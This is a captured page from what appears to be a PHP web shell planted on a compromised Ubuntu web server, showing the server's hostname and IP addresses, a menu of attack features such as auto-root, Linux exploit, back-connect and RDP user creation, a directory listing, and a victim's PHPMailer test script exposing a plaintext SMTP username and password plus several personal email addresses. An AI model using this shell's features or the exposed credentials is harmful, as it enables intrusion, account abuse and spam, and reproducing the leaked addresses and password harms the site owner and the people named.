Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.219.81.129
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cnv /
sdu_wait /
phpmailer /
[ HOME SHELL ]
Name
Size
Permission
Action
class.phpmailer.php
78.17
KB
-rwxr-xr-x
class.pop3.php
10.14
KB
-rwxr-xr-x
class.smtp.php
24.01
KB
-rwxr-xr-x
phpmailer_doc.html
34.5
KB
-rwxr-xr-x
test.php
837
B
-rwxr-xr-x
test1.php
1.16
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test1.php
<?php ini_set("display_errors","On"); require("class.phpmailer.php"); $mail = new PHPMailer(); $mail->IsSMTP(); // send via SMTP $mail->Host = "smtp.ecandor.com"; // SMTP servers $mail->SMTPAuth = false; // turn on SMTP authentication $mail->Username = "salary@ecandor.com"; // SMTP username $mail->Password = "candorsalary123"; // SMTP password $mail->From = "salary@ecandor.com"; $mail->FromName = "Ecandor"; $mail->AddAddress("natesha.s@tarkasoft.com","Natesha"); $mail->AddAddress("ssnatesha@gmail.com","Natesha Gmail"); $mail->AddAddress("hrangaswamaiah@intevaproducts.com","hrangaswamaiah"); $mail->AddAddress("SDSouza@intevaproducts.com","SDSouza"); $mail->AddReplyTo("salary@ecandor.com","Ecandor"); $mail->WordWrap = 50; // set word wrap $mail->IsHTML(true); // send as HTML $mail->Subject = "Here is the subject"; $mail->Body = "This is the <b>HTML body</b>"; $mail->AltBody = "This is the text-only body"; if(!$mail->Send()) { echo "Message was not sent <p>"; echo "Mailer Error: " . $mail->ErrorInfo; exit; } echo "Message has been sent"; ?>
Close